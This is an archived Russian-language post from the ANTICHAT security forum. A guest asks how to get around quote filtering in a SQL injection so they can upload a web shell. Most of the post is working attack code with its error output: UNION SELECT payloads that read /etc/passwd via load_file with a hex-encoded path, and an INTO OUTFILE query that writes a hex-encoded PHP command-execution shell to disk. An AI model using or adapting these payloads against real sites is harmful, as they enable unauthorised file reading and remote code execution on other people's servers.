ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.02.2014, 19:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Добрый день, помогите, пожалуйста, обойти блокировку кавычек для заливки шелла. Права на заливку есть.
-3+UNION+ALL+SELECT+1,2,3,
load_file(0x2f6574632f706173737764)
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,
19,20,21,22,23,24,25,26,27--
- подобный запрос без ошибок открывает файл /etc/passwd.
Если убрать hex, load_file('/etc/passwd')
-3+UNION+ALL+SELECT+1,2,load_file(%27/etc/passwd%27),4-- выдает
DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/etc/passwd'),4--' at line 1
(в идентичном параметре, поэтому разное кол-во колонок)
Заливка шелла:
-3+UNION+ALL+SELECT+1,2,3,0x3c3f696e636c75646528245 f4745545b22636d64225d293b3f3e,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+INTO+O UTFILE+%27/tmp/smthng.txt%27--
выдает:
[COLOR="Red"]
DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/tmp/smthng.txt'-- AND publish_date
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид